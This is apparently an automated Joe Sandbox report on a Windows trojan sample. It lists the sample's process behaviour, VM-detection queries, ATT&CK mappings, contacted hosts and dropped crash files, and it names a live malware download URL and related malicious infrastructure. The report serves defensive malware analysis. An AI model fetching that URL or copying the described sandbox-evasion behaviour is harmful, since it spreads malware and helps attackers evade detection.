Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Memory allocated: 1EC7D200000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Memory allocated: 1EC7EE00000 memory reserve \| memory write watch			Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: iGxCM2I5u9.exe, 00000000.00000002.2313961291.000001EC7D182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Queries volume information: C:\Users\user\Desktop\iGxCM2I5u9.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iGxCM2I5u9.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
iGxCM2I5u9.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://orange-loris-425181.hostingersite.com/uploads/clean.exepV	0%	Avira URL Cloud	safe
http://orange-loris-425181.hostingersite.com	0%	Avira URL Cloud	safe
https://orange-loris-425181.hostingersite.com	0%	Avira URL Cloud	safe
https://orange-loris-425181.hostingersite.com/uploads/clean.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
free.cdn.hstgr.net	84.32.84.122	true	false		high
orange-loris-425181.hostingersite.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://orange-loris-425181.hostingersite.com/uploads/clean.exe	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://free.cdn.hstgr.net	iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	iGxCM2I5u9.exe, 00000000.00000002.2314680258.000001EC7ECA1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://orange-loris-425181.hostingersite.com/uploads/clean.exepV	iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css	iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://orange-loris-425181.hostingersite.com	iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000A8000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://orange-loris-425181.hostingersite.com	iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.32.84.122	free.cdn.hstgr.net	Lithuania		33922	NTT-LT-ASLT	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569093
Start date and time:	2024-12-05 13:04:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iGxCM2I5u9.exe renamed because original name is a hash value
Original Sample Name:	2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c.exe
Detection:	MAL
Classification:	mal72.evad.winEXE@2/5@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 11 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target iGxCM2I5u9.exe, PID 6420 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: iGxCM2I5u9.exe

Simulations

Behavior and APIs

Time	Type	Description
07:05:24	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.32.84.122	Purchase_Order_PA056223.pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.1stsole.com/oa21/?u6al_=niA2MlpkbxJ4Mq6wpnhlUOBAu/LmwJ6ICug6ywS8gbH4QnqQ5s3YCt8UK27E3//jN+UG&I8qdZf=ZN941p00dP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
free.cdn.hstgr.net	FmmYUD4pt7.wsf	Get hash	malicious	Unknown	Browse	84.32.84.136
	https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31d	Get hash	malicious	Unknown	Browse	84.32.84.121
	http://zip.lu/?redirect=3k7wI	Get hash	malicious	Unknown	Browse	84.32.84.104
	https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/	Get hash	malicious	Unknown	Browse	84.32.84.197
	http://zip.lu/?redirect=3k7wI	Get hash	malicious	Unknown	Browse	84.32.84.227
	https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/	Get hash	malicious	Unknown	Browse	93.127.179.137
	e0OOofAl0S.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	191.96.144.157
	oZB7n3wuNk.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	84.32.84.152
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	185.77.97.68
	V6n3oygctH.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	84.32.84.249

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	SRT68.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	http://editableslides.co	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	84.32.84.208
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	SW_5724.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	attached invoice.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	84.32.53.129
	attached order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.32
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.32
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	84.32.51.16
	NfFibKKmiz.exe	Get hash	malicious	Unknown	Browse	84.32.131.125

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	1AxSwjpyGp.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	84.32.84.122
	V5P3YggUcy.exe	Get hash	malicious	LummaC Stealer	Browse	84.32.84.122
	FPBKcOFjEP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	84.32.84.122
	V5P3YggUcy.exe	Get hash	malicious	LummaC Stealer	Browse	84.32.84.122
	LiteDBViewer.exe	Get hash	malicious	LummaC Stealer	Browse	84.32.84.122
	MerchantDetailedStatement_37063_04122024.exe	Get hash	malicious	AgentTesla	Browse	84.32.84.122
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse	84.32.84.122
	payload_1.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	84.32.84.122
	ky.ps1	Get hash	malicious	Unknown	Browse	84.32.84.122
	List of Required items xlsx.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	84.32.84.122

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_iGxCM2I5u9.exe_ba38550e7d6f47114336f3c752a4f3c785248ac_26afa5d7_f19546a9-fe2e-4de8-b173-2206535a8c0c\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2522039650068986
Encrypted:	false
SSDEEP:	192:jZTs2Z4024L57aWB+9lR1yiXzuiFjZ24lO8W:9Ts2d2k57amUjxXzuiFjY4lO8W
MD5:	4DA5BE2CE2344EDB153F0F6D1D0D6C22
SHA1:	1AC0616DD1933AF1B38308850A4FDA950F1CA375
SHA-256:	5FECED282237E2071B108D0BDF2382B31321F59C5CA7A7C434DD257005F240E3
SHA-512:	A3F2954DB6206ADA6DDD28815E980A9A08831287E9B4CE5CDCA97E52207D5C1AC48A71B4C16FCE55343675AFE3202F1D7C39FF51B40F89B952F043C81A27B138
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.7.3.8.9.9.1.8.3.6.4.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.7.3.8.9.9.8.2.4.2.6.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.9.5.4.6.a.9.-.f.e.2.e.-.4.d.e.8.-.b.1.7.3.-.2.2.0.6.5.3.5.a.8.c.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.5.a.5.4.6.f.-.7.2.0.2.-.4.e.a.f.-.a.0.c.b.-.3.c.1.7.b.f.2.b.b.c.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.i.G.x.C.M.2.I.5.u.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.1.4.-.0.0.0.1.-.0.0.1.4.-.7.6.1.2.-.2.4.e.6.0.d.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.e.e.2.e.3.a.e.3.8.a.9.b.c.0.f.4.1.b.6.8.2.d.f.6.4.c.6.a.d.1.7.0.0.0.0.0.0.0.0.!.0.0.0.0.3.5.2.4.2.2.8.0.f.5.5.1.6.8.4.b.9.e.4.7.7.2.6.d.5.f.9.4.f.1.6.1.5.c.0.d.c.7.6.e.!.i.G.x.C.M.2.I.5.u.9...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DAB.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Dec 5 12:04:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	430988
Entropy (8bit):	3.1531423801095384
Encrypted:	false
SSDEEP:	3072:JRoBwJkKmrykK4BfcS3PQ6prUAz1CCq4Jr1gSotQx3+vyLR1:0BwiSo3o6phrq4Jr1gSo43QM
MD5:	2485EAFCC11A40F9A223C4F666A17F3E
SHA1:	5FBDF5D4EDB174E4CB2764A3C90C39314E5AF783
SHA-256:	F7DFAA4A046848BD72FE98891A774D3B37E9926EB658CACF7C901072AFE0A6D7
SHA-512:	A328F88C729321BE909115A0D6A66C0CC3CBA8399EA02B2B6E5AB6D41EFBAA2039DE6F658EE9D9538D715D7BA9B16B2CCE4D298B9AA739831C23D2900950B549
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........Qg.........................!..........<....+......H....+......44.............l.......8...........T...........hR..$A...........:...........;..............................................................................eJ.......<......Lw......................T............Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F71.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8760
Entropy (8bit):	3.6938725707604605
Encrypted:	false
SSDEEP:	192:R6l7wVeJjSOr6YEIsSGKfYgmfZ816BUpDB89bDUUf+HBm:R6lXJ2M6YEzSGKfYgmfe83DPf+c
MD5:	6E1E0917FFD17034DE94A8A99FF73ECD
SHA1:	10076817C8BDB45FAE93BD13254371C7C98BDC6F
SHA-256:	34CA25201E5BCFAD236DFEE0F082A7BEE9E8C9026E8F3A15735BB6246AE1F6EC
SHA-512:	EE21F2E09DEA07B60EB2D31ED1760FF83D2F8448A96C6D12AAF07EF1046A078824B5D5CFBC2D10830DEEA0027F6F55C93C9C375F48013742FF4F5BBC07059E3B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FC0.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.4484366382701115
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZpuJg771I9p2WpW8VYg0Ym8M4JCqPFxIyq8vCq2CX7S7OHxwd:uIjfUI7+X7VrJOWjX7SiRwd
MD5:	CB8FE1D8D6CFD461DA0643C9B0C44ED6
SHA1:	74CEF4803913C6FA8D1C9F49E616483AA5732A09
SHA-256:	B183234130139091FBB1BA03E123C32DE26221A97B80F2790EF47FD878E21B58
SHA-512:	BD8DC3231E7F726E0FFB0929D414B33B4D45DEEEB89D98BBC21EC7BB0C24562D48AF523CE24D2831A601CC347EDEB7325EDEC1404E789EDB84295294F3006099
Malicious:	false
Reputation:	low
